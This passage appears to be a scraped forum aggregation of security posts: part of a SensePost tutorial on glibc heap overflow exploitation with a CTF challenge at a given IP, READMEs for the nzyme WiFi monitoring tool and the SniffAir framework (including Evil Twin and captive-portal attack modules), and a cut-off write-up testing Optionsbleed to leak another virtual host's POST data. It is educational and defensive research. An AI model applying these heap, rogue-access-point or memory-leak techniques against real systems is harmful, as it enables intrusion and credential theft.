B = \x01\x01| <-- PREV_SIZE now doesn't match B size +-----------------------+ |CHUNK C SIZE = \x41| <-- 0x100 + 0x1 +-----------------+-+-+-+ | | | | | | | | +-----------------------+ | TOP | <-- B->fd and B->fk point here +-----------------------+ | | | | | | | | +-----------------------+ 3 – Ok! The buffer overflow is triggered now and chunk’s B size has been changed to 0x151. What should happen now to overlap into chunk C? We would need an allocation of a size near to: old B size + C size = 0x100 + 0x40. When the following allocation happens: B = malloc(0x100+0x40); Chunk B will be now overlapping chunk C in its entirety as we can see in the following figure. -=Data gets populated from right to left and from top to bottom=- <--- 8 bytes wide ---> +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |CHUNK B SIZE = \x01\x51| <-- Size Overflown 0x151 +-----------------+-+-+-+ |B->fd = main_arena->TOP| <-- Even if allocated... |B->bk = main_arena->TOP| <-- ...memory isn't cleared and... +-----------------------+ |PREV_SIZE B = \x01\x01| <-- ...values are kept in memory. +-----------------------+ |CHUNK C SIZE = \x41| +-----------------+-+-+-+ | | | | | | | | +-----------------------+ <-- B now takes up to here (1) | TOP | +-----------------------+ | | | | | | | | +-----------------------+ (1) The “mathemata” out there must have spotted that chunk B actually goes 8 bytes into TOP but that is not a problem for us for now. 4 – As a last step, we would just need to write into chunk B at our desired position, effectively achieving our main goal: Writing into chunk C. -=Data gets populated from right to left and from top to bottom=- <--- 8 bytes wide ---> +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| +-----------------+-+-+-+ |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| |x51\x51\x51\x51\x51\x51| +-----------------+-+-+-+ |CHUNK B SIZE = \x01\x51| +-----------------+-+-+-+ |x42\x42\x42\x42\x42\x42| <-- Setting all B to hex('B') = '\x42' |x42\x42\x42\x42\x42\x42| +-----------------------+ |x42\x42\x42\x42\x42\x42| +-----------------------+ |x42\x42\x42\x42\x42\x42| +-----------------+-+-+-+ |x42\x42\x42\x42\x42\x42| <-- chunk C got overlapped and written |x42\x42\x42\x42\x42\x42| |x42\x42\x42\x42\x42\x42| |x42\x42\x42\x42\x42\x42| +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Cool. If previous to filling all of chunk B with \x42, the “magically disappeared” chunk C gets free()‘d we will be able to leak pointers to main_arena->top by reading the contents of B. Also if C is still used, we can control the data inside it by writing on high positions at B. There are many more possibilities! One null byte write This scenario is initially the same as the previous one except that the sizes are A(0x100), B(0x250) and C(0x100); also, we can only overflow with a null byte \x00. As the first steps are the same as the one byte write, we are going straight into the null byte overflow. Note that this is more likely to happen because in C, all strings must be terminated with the “null byte”. Our goal here is to make the implementation forget about an allocated chunk by overlapping it with free space. 1 – We overflow in the same way as before but what is going to happen is a pretty much different thing than before. We are shrinking the size of chunk B from 0x250 to 0x200. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| <-- ANY STRING CAN GO HERE | EB LLIW TI ESUACEB| <-- BECAUSE IT WILL BE | DETANIMRET LLUN| <-- NULL TERMINATED |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE B SIZE = \x02\x00| <-- Size byte overflown 0x250 --> 0x200 +-----------------+-+-+-+ |B->fd = main_arena->TOP| |B->bk = main_arena->TOP| | | | | <-- Free B ends here now (1) | | | | +-----------------------+ <-- Free space still ends here (2) |PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size +-----------------------+ |CHUNK C SIZE = \x01\x00| <-- PREV_INUSE is zero now. +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Chunk B has shrunk (1) and this will have its consequences. The first and easiest to see is that chunk’s C PREV_SIZE (remember that this value is used to merge free chunks) is different from the actual chunk’s B size. The second consequence is that for the implementation, the free space between chunk A and chunk C (2) is somewhat “divided” from the implementation’s perspective (it is corrupted already). This consequences together have a third and final consequence. If we allocate two new chunks (J and K) of smaller size than 0x200/2 (0x100)… 2 – … the implementation is going to properly allocate these in the space of chunk B because there is space for two chunks of size, let’s say, 0x80. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |CHUNK J SIZE = \x00\x81| +-----------------+-+-+-+ | | | | +-----------------------+ |CHUNK K SIZE = \x00\x81| +-----------------------+ | | | | +-----------------------+ |PREV_SIZE B = \x02\x50| <-- C PREV_SIZE doesn't match B size +-----------------------+ |CHUNK C SIZE = \x01\x00| +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Not much to explain about two simple allocations. This leads us onto the final part. Can you see which chunk is about to disappear to the implementation (Forgotten Chunk)? 3 – Finally if we free() chunk J and chunk C in that order the unlink macro will kick in and merge both chunks into one free space. So, which chunk is between the cape formed by chunk’s J and C? That’s right, the newly allocated chunk K. First chunk J is free()‘d – note that K‘s PREV_INUSE is zero now due to the previous chunk J being free. -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE J SIZE = \x00\x81| (3) +-----------------+-+-+-+ |J->fd = main_arena->TOP| |J->bk = main_arena->TOP| +-----------------------+ |CHUNK K SIZE = \x00\x80| +-----------------------+ | | | | +-----------------------+ |PREV_SIZE B = \x02\x50| (2) +-----------------------+ |CHUNK C SIZE = \x01\x00| (1) +-----------------+-+-+-+ | | | | +-----------------------+ | TOP | +-----------------------+ | | | | | | | | +-----------------------+ 4 – Then, we are free()‘ing C. Now pay close attention to the following: – Chunk C PREV_INUSE bit is unset (1) – Chunk C PREV_SIZE is still the old B size 0x250 (2) – Chunk J is also free and at the position of old B (0x250 bytes back from chunk C) (3) They are explained in reverse order because this is exactly how the unlink macro is going over all of them. Check’s that the current free()‘d chunk has its PREV_INUSE bit unset (1), then it proceeds to merge the other free()‘d chunk which is at C – PREV_SIZE = J. Now J and C are merged into one big free space at J. Poor K was in the middle of this merge situation and is now treated as free space – ptmalloc2 forgot about him -=Data gets populated from right to left and from top to bottom=- +-----------------+-+-+-+ |CHUNK A SIZE = \x01\x01| <-- Size 0x100 + 0x1 (PREV_INUSE bit) +-----------------+-+-+-+ | EREH OG NAC GNIRTS YNA| | EB LLIW TI ESUACEB| | DETANIMRET LLUN| |AAAAAAAAAAAAAAAAAAAAAAA| +-----------------+-+-+-+ |FREE J SIZE = \x03\x51| <-- Free size starting here +-----------------+-+-+-+ |J->fd = main_arena->TOP| |J->bk = main_arena->TOP| + - - - - - - - + | CHUNK K FORGOTTEN! | + - - - - - - - + | | | | + - - - - - - - + | | | | | | | | | | | | +-----------------------+ <-- Free size ends here | TOP | +-----------------------+ | | | | | | | | +-----------------------+ Now chunk K is in the new free()‘d area (in green) which again has nearly the same implications as the previous scenario: use-after-invalidation, leaks, arbitrary writes, etc. The playground Let’s go have some fun! As in the previous series I am trying to create a tradition by providing proof of concepts and a challenge! You can get the playground’s code here. Download Playground Code In order to not make this blog post longer than expected, the proof of concepts provided are directly related with the When stars align section. Worry not for I have heavily commented each PoC. But wait! Don’t think I would be that lazy! Here, have some videos and a little explanation. One byte write This PoC is based around on writing to chunk C. An X is written to a point in B after the vulnerability is triggered. This point in chunk B is exactly the previous to last byte in the overlapped C. One null byte write This one corresponds to the second scenario with the difference that instead of creating J and K chunk variables, I have reused the B variable and just added an X variable to hold the fourth chunk. This chunk X is the one to be overlapped and overwritten as we can see in the following video. Now you This second challenge is on 178.62.74.135 on ports 10000, 10001. Your goal is to retrieve the flag by overlapping a chunk that you cannot read directly from – the vulnerable chunk is A! nc 178.62.74.135 10000 -v nc 178.62.74.135 10001 -v The flag is in the form: SP{contents_of_the_flag}. Note that you must send us your exploit source code to be eligible to win! The winner will win a SensePost shirt and will be chosen regarding the following criteria: Originality – Programming Language, code length, formatting, comments, etc. Accurate – Did you do the maths or bruteforced it? Hints – There are 3 allocated chunks already: A(0x100), B(0x100) & C(0x80) – Values with the last 3 bits set can cause weird behaviour – There are hidden easter eggs for those trying to break things further – You can calculate or either brute force it. Your call! – No, you don’t need to solve the 2016 challenge References [1] Glibc Adventures: The Forgotten Chunks Chris Evans/Tavis Ormandis – Single NUL byte overflow Painless intro to the linux userland heap Sursa: https://sensepost.com/blog/2017/linux-heap-exploitation-intro-series-the-magicians-cape-1-byte-overflow/
-
- 1
-
-
Nzyme Introduction Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (Open Source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Think about this like a long-term (months or years) distributed Wireshark/tcpdump that can be analyzed and filtered in real-time, using a powerful UI. If you are new to the fascinating space of WiFi security, you might want to read my Common WiFi Attacks And How To Detect Them blog post. What kind of data does it collect? Nzyme collects, parses and forwards all relevant 802.11 management frames. Management frames are unecrypted so anyone close enough to a sending station (an access point, a computer, a phone, a lightbulb, a car, a juice maker, ...) can pick them up with nzyme. Association request Association response Probe request Probe response Beacon Disassociation Authentication Deauthentication What do I need to run it? Everything you need is available from Amazon Prime and is not very expensive. There even is a good chance you have the parts around already. One or more WiFi adapters that support monitor mode on your operating system. The most important component is one (or more) WiFi adapters that support monitor mode. Monitor mode is the special state of a WiFi adapter that makes it read and report all 802.11 frames and not only certain management frames or frames of a network it is connected to. You could also call this mode sniffing mode: The adapter just spits out everything it sees on the channel it is tuned to. The problem is, that many adapter/driver/operating system combinations do not support monitor mode. The internet is full of compatibility information but here are the adapters I run nzyme with on a Raspberry Pi 3 Model B: ALFA AWUS036NH - 2.4Ghz and 5Ghz (Amazon Prime, about $40) ALFA AWUS036NEH - 2.4Ghz (Amazon Prime, about $50) If you have another one that supports monitor mode, you can use that one. Nzyme does by far not require any specific hardware. A small computer to run nzyme on. I recommend to run nzyme on a Raspberry Pi 3 Model B. This is pretty much the reference architecture, because that is what I run it on. In the end, it shoulnd’t really matter what you run it on, but the docs and guides will most likely refer to a Raspberry Pi with a Raspbian on in. A Graylog setup You need a Graylog setup with ah GELF TCP input that is reachable by your nzyme sensors. Channel hopping The 802.11 standard defines many frequencies (channels) a network can operate on. This is useful to avoid contention and bandwidth issues, but also means that your wireless adapter has to be tuned to a single channel. During normal operations, your operating system will do this automatically for you. Because we don’t want to listen on only one, but possibly all WiFi channels, we either need dozens of adapters, with one adapter for each channel, or we cycle over multiple channels on a single adapter rapidly. Nzyme allows you to configure multiple channels per WiFi adapter. For example, if you configure nzyme to listen on channel 1,2,3,4,5,6 on wlan0 and 7,8,9,10,11 on wlan1, it will tune wlan0 to channel 1 for a configurable time (default is 1 second) and then switch to channel 2, then to channel 3 and so on. By doing this, we might miss a bunch of wireless frames but are not missing out on some channels completely. The best configuration depends on your use-case but usually you will want to tune to all 2.4 Ghz and 5 Ghz WiFi channels. On Linux, you can get a list of channels your WiFi adapter supports like this: $ iwlist wlan0 channel wlan0 32 channels in total; available frequencies : Channel 01 : 2.412 GHz Channel 02 : 2.417 GHz Channel 03 : 2.422 GHz Channel 04 : 2.427 GHz Channel 05 : 2.432 GHz Channel 06 : 2.437 GHz Channel 07 : 2.442 GHz Channel 08 : 2.447 GHz Channel 09 : 2.452 GHz Channel 10 : 2.457 GHz Channel 11 : 2.462 GHz Channel 12 : 2.467 GHz Channel 13 : 2.472 GHz Channel 14 : 2.484 GHz Channel 36 : 5.18 GHz Channel 38 : 5.19 GHz Channel 40 : 5.2 GHz Channel 44 : 5.22 GHz Channel 46 : 5.23 GHz Channel 48 : 5.24 GHz Channel 52 : 5.26 GHz Channel 54 : 5.27 GHz Channel 56 : 5.28 GHz Channel 60 : 5.3 GHz Channel 62 : 5.31 GHz Channel 64 : 5.32 GHz Channel 100 : 5.5 GHz Channel 102 : 5.51 GHz Channel 104 : 5.52 GHz Channel 108 : 5.54 GHz Channel 110 : 5.55 GHz Channel 112 : 5.56 GHz Current Frequency:2.432 GHz (Channel 5) Things to keep in mind A few general things to know before you get started: Success will highly depend on how well supported your WiFi adapters and drivers are. Use the recommended adapters for best results. You can get them from Amazon Prime and have them ready in one or two days. At least on OSX, your adapter will not switch channels when already connected to a network. Make sure to disconnect from networks before using nzyme with the on-board WiFi adapter. On other systems, switching to monitor mode should disconnect the adapter from a possibly connected network. Nzyme works well with both the OpenJDK or the Oracle JDK and requires Java 7 or 8. Wifi adapters can draw quite some current and I have seen Raspberry Pi 3’s shut down when connecting more than 3 ALFA adapters. Consider this before buying tons of adapters. Testing on a MacBook (You can skip this and go straight to a real installation on a Raspberry Pi or install it on any other device that runs Java and has supported WiFi adapters connected to it.) Requirements Nzyme is able to put the onboard WiFi adapter of recent MacBooks into monitor mode so you don’t need an external adapter for testing. Remember that you cannot be connected to a wireless network while running nzyme, so the Graylog setup you send data to has to be local or you need a wired network connection or a second WiFi adapter as LAN/WAN uplink. Make sure you have Java 7 or 8 installed: $ java -version java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-macbook-1 channels = en0:1,2,3,4,5,6,8,9,10,11 channel_hop_command = sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run After disconnecting from all WiFi networks (you might have to "forget" them in the macOS WiFi settings), you can start nzyme like this: $ java -jar nzyme-0.1.jar -c nzyme.conf 18:35:00.261 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 18:35:00.307 [main] WARN horse.wtf.nzyme.Nzyme - No Graylog uplinks configured. Falling back to Log4j output 18:35:00.459 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [en0] 18:35:00.474 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [en0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11>. 18:35:00.483 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [en0] ... (⌐■_■)–︻╦╤─ – – pew pew Nzyme is now collecting data and writing it into the Graylog input you configured. A message will look like this: Installation and configuration on a Raspberry Pi 3 Requirements The onboard WiFi chips of recent Raspberry Pi models can be put into monitor mode with the alternative nexmon driver. The problem is, that the onboard antenna is not very good. If possible, use an external adapter that supports monitor mode instead. Make sure you have Java 7 or 8 installed: $ java -version openjdk version "1.8.0_40-internal" OpenJDK Runtime Environment (build 1.8.0_40-internal-b04) OpenJDK Zero VM (build 25.40-b08, interpreted mode) Download and configure Download the most recent build from the [Releases] page. Create a new file called nzyme.conf in the same folder as your nzyme.jar file: nzyme_id = nzyme-sensors-1 channels = wlan0:1,2,3,4,5,6,8,9,10,11,12,13,14|wlan1:36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112 channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel} channel_hop_interval = 1 graylog_addresses = graylog.example.org:12000 beacon_frame_sampling_rate = 0 Note the graylog_addresses variable that has to point to a GELF TCP input in your Graylog setup. Adapt it accordingly. Please refer to the example config in the repository for a more verbose version with comments. Run $ java -jar nzyme-0.1.jar -c nzyme.conf 17:28:45.657 [main] INFO horse.wtf.nzyme.Main - Printing statistics every 60 seconds. Logs are in [logs/] and will be automatically rotated. 17:28:51.637 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan0] 17:28:53.178 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan0] acquired. Cycling through channels <1,2,3,4,5,6,8,9,10,11,12,13,14>. 17:28:53.268 [nzyme-loop-0] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan0] ... (⌐■_■)–︻╦╤─ – – pew pew 17:28:54.926 [main] INFO horse.wtf.nzyme.Nzyme - Building PCAP handle on interface [wlan1] 17:28:56.238 [main] INFO horse.wtf.nzyme.Nzyme - PCAP handle for [wlan1] acquired. Cycling through channels <36,38,40,44,46,48,52,54,56,60,62,64,100,102,104,108,110,112>. 17:28:56.247 [nzyme-loop-1] INFO horse.wtf.nzyme.Nzyme - Commencing 802.11 frame processing on [wlan1] ... (⌐■_■)–︻╦╤─ – – pew pew Collected frames will now start appearing in your Graylog setup. Note that DEB and RPM packages are in the making and will be released soon. Renaming WiFi interfaces (optional) The interface names wlan0, wlan1 etc are not always deterministic. Sometimes they can change after a reboot and suddenly nzyme will attempt to use the onboard WiFi chip that does not support moniotr mode. To avoid this problem, you can "pin" interface names by MAC address. I like to rename the onboard chip to wlanBoard to avoid accidental usage. This is what ifconfig looks like with no external WiFi adapters plugged in. pi@parabola:~ $ ifconfig eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1327 errors:0 dropped:22 overruns:0 frame:0 TX packets:1118 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:290630 (283.8 KiB) TX bytes:233228 (227.7 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:304 errors:0 dropped:0 overruns:0 frame:0 TX packets:304 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:24552 (23.9 KiB) TX bytes:24552 (23.9 KiB) wlan0 Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 inet6 addr: fe80::77be:fb8a:ad75:cca9/64 Scope:Link UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) In this case wlan0 is the onboard WiFi chip that we want to rename to wifiBoard. Open the file /lib/udev/rules.d/75-persistent-net-generator.rules and add wlan* to the device name whitelist: # device name whitelist KERNEL!="wlan*|ath*|msh*|ra*|sta*|ctc*|lcs*|hsi*", \ GOTO="persistent_net_generator_end" Reboot the system. After it is back up, open /etc/udev/rules.d/70-persistent-net.rules and change the NAME variable: SUBSYSTEM=="net", ACTION=="add", DRIVERS=="?*", ATTR{address}=="b8:27:eb:5a:5b:81", ATTR{dev_id}=="0x0", ATTR{type}=="1", KERNEL=="wlan*", NAME="wlanBoard" Reboot the system again and enjoy the consistent naming. Any new WiFi adapter you plug in, will be a classic, numbered wlan0, wlan1 etc that can be safely referenced in the nzyme config without the chance of accidentally selecting the onboard chip, because it's called wlanBoard now. eth0 Link encap:Ethernet HWaddr b8:27:eb:0f:0e:d4 inet addr:172.16.0.136 Bcast:172.16.0.255 Mask:255.255.255.0 inet6 addr: fe80::8966:2353:4688:c9a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:349 errors:0 dropped:8 overruns:0 frame:0 TX packets:378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:75761 (73.9 KiB) TX bytes:69865 (68.2 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:228 errors:0 dropped:0 overruns:0 frame:0 TX packets:228 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:18624 (18.1 KiB) TX bytes:18624 (18.1 KiB) wlanBoard Link encap:Ethernet HWaddr b8:27:eb:5a:5b:81 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Known issues Some WiFi adapters will not report the MAC timestamp in the radiotap header. The field will simply be missing in Graylog. This is usually an issue with the driver. The deauthentication and disassociation reason field is not reported correctly on some systems. This is known to be an issue on a 2016 MacBook Pro running macOS Sierra. Legal notice Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data on unlicensed frequencies. Sursa: https://github.com/lennartkoopmann/nzyme
-
- 1
-
-
SniffAir SniffAir is an open-source wireless security framework. Sniffair allows for the collection, management, and analyzation of wireless traffic. In additional, SniffAir can also be used to preform sophisticated wireless attacks. SniffAir was born out of the hassle of managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws or malicious traffic. SniffAir is developed by @Tyl0us and @theDarracott Install To install run the setup.py script $python setup.py Usage % * ., % % ( ,# (..# % /@@@@@&, *@@% &@, @@# /@@@@@@@@@ .@@@@@@@@@. ,/ # # (%%%* % (.(. .@@ &@@@@@@%. .@@& *&@ %@@@@. &@, @@% %@@,,,,,,, ,@@,,,,,,, .( % % %%# # % # ,@@ @@(,,,#@@@. %@% %@@(@@. &@, @@% %@@ ,@@ /* # /*, %.,, ,@@ @@* #@@ ,@@& %@@ ,@@* &@, @@% %@@ ,@@ .# //#(, (, ,@@ @@* &@% .@@@@@. %@@ .@@( &@, @@% %@@%%%%%%* ,@@%%%%%%# (# ##. ,@@ @@&%%%@@@% *@@@@ %@@ .@@/ &@, @@% %@@,,,,,, ,@@,,,,,,. %#####% ,@@ @@(,,%@@% @@% %@@ @@( &@, @@% %@@ ,@@ % (*/ # ,@@ @@* @@@ %@% %@@ @@&&@, @@% %@@ ,@@ % # .# .# ,@@ @@* @@% .@@&/,,#@@@ %@@ &@@@, @@% %@@ ,@@ /(* /(# ,@@ @@* @@# *%@@@&* *%# ,%# #%/ *%# %% #############. .%# #%. .%% (@Tyl0us & @theDarracott) >> [default]# help Commands ======== workspace Manages workspaces (create, list, load, delete) live_capture Initiates an valid wireless interface to collect wireless pakcets to be parsed (requires the interface name) offline_capture Begins parsing wireless packets using an pcap file-kistmit .pcapdump work best (requires the full path) offline_capture_list Begins parsing wireless packets using an list of pcap file-kistmit .pcapdump work best (requires the full path) query Executes a quey on the contents of the acitve workspace help Displays this help menu clear Clears the screen show Shows the contents of a table, specific information accorss all tables or the avilable modules inscope Add ESSID to scope. inscope [ESSID] use Use a SniffAir module info Displays all varible infomraiton regardin the selected module set Sets a varible in module exploit Runs the loaded module exit Exit SniffAir >> [default]# Begin First create or load a new or existing workspace using the command workspace create <workspace> or workspace load <workspace> command. To view all existing workspaces use the workspace list command and workspace delete <workspace> command to delete the desired workspace: >> [default]# workspace Manages workspaces Command Option: workspaces [create|list|load|delete] >> [default]# workspace create demo [+] Workspace demo created Load data into a desired workplace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files use the command offline_capture_list <the full path to the file containing the list of pcap name> (this file should contain the full patches to each pcap file). >> [demo]# offline_capture /root/sniffair/demo.pcapdump \ [+] Completed [+] Cleaning Up Duplicates [+] ESSIDs Observed Show Command The show command displays the contents of a table, specific information across all tables or the available modules, using the following syntax: >> [demo]# show table AP +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ | ID | ESSID | BSSID | VENDOR | CHAN | PWR | ENC | CIPHER | AUTH | |------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------| | 1 | HoneyPot | c4:6e:1f:0c:82:03 | TP-LINK TECHNOLOGIES CO. LTD. | 4 | -17 | WPA2 | TKIP | MGT | | 2 | Demo | 80:2a:a8:5a:fb:2a | Ubiquiti Networks Inc. | 11 | -19 | WPA2 | CCMP | PSK | | 3 | Demo5ghz | 82:2a:a8:5b:fb:2a | Unknown | 36 | -27 | WPA2 | CCMP | PSK | | 4 | HoneyPot1 | c4:6e:1f:0c:82:05 | TP-LINK TECHNOLOGIES CO. LTD. | 36 | -29 | WPA2 | TKIP | PSK | | 5 | BELL456 | 44:e9:dd:4f:c2:7a | Sagemcom Broadband SAS | 6 | -73 | WPA2 | CCMP | PSK | +------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+ >> [demo]# show SSIDS --------- HoneyPot Demo HoneyPot1 BELL456 Hidden Demo5ghz --------- The query command can be used to display a unique set of data based on the parememters specificed. The query command uses sql syntax. Modules Modules can be used to analyze the data contained in the workspaces or preform offensive wireless attacks using the use <module name> command. For some modules additional variables may need to be set. They can be set using the set command set <variable name> <variable value>: >> [demo]# show modules Available Modules [+] Run Hidden SSID [+] Evil Twin [+] Captive Portal [+] Auto EAP [+] Exporter >> [demo]# >> [demo]# use Captive Portal >> [demo][Captive Portal]# info Globally Set Varibles ===================== Module: Captive Portal Interface: SSID: Channel: Template: Cisco (More to be added soon) >> [demo][Captive Portal]# set Interface wlan0 >> [demo][Captive Portal]# set SSID demo >> [demo][Captive Portal]# set Channel 1 >> [demo][Captive Portal]# info Globally Set Varibles ===================== Module: Captive Portal Interface: wlan0 SSID: demo Channel: 1 Template: Cisco (More to be added soon) >> [demo][Captive Portal]# Once all varibles are set, then execute the exploit command to run the desired attack. Export To export all information stored in a workspace’s tables using the Exporter module and setting the desired path. Sursa: https://github.com/Tylous/SniffAir
-
- 1
-
-
Testing Optionsbleed Written by:Mike Czumak Written on:September 23, 2017 Introduction I took a few minutes to test the Optionsbleed vuln (CVE-2017-9798), specifically to see whether modifying the length and/or quantity of Options/Methods in the .htaccess file would enable me to extract anything of substance from memory. Ultimately it seems that by modifying the length of the entries in the .htaccess file, I was able to gain access to hundreds of bytes of POST data of a different virtual host. Details My setup was simple…two virtual hosts running an an Apache server hosted on a Linux VM. Each virtual host ran on a different port and had separate directories and error logs. Virtual Host 1 (the running on port 80) was simply hosting a “hello” index.html. This was going to be my “attacker” site that would host the malicious .htaccess file. Virtual Host 2 (the “victim” site running on port 81) was hosting a php page that takes three inputs…username, password, and a third, variable length variable. 1 2 3 4 5 6 7 8 9 10 11 <?php $user = $_POST["username"]; $pwd = $_POST["password"]; $otherdata = $_POST["otherdata"]; ?> <form action="index.php" method="POST"> Otherdata: <input type="text" name="otherdata"><br> Username: <input type="text" name="username"><br> Password: <input type="text" name="password"><br> <input type="submit" value="Submit"> </form> Throughout the remainder of this post, I’ll refer to them as Site1 (Attacker Site on Virtual Host 1) and Site 2 (Victim Site on Virtual Host 2). I started with an .htaccess file on Site1 that looked as follows: 1 2 3 <Limit method0 method1 method2 method3 method4 method5> Allow from all </Limit> Making several OPTIONS requests for Site1 resulted in a modified but fairly innocuous Accept header: 1 Allow: GET,POST,OPTIONS,HEAD,,allow,,,,,,,,,,,,,,, Slight modifications in content and length did return a few varying bytes but nothing very different from the examples I had already seen online and nothing that was of particular interest. I started extending the length of each option/method in the .htacess file (using a simple numeric string of 0123456789) until I got to the following <Limit 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789 0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234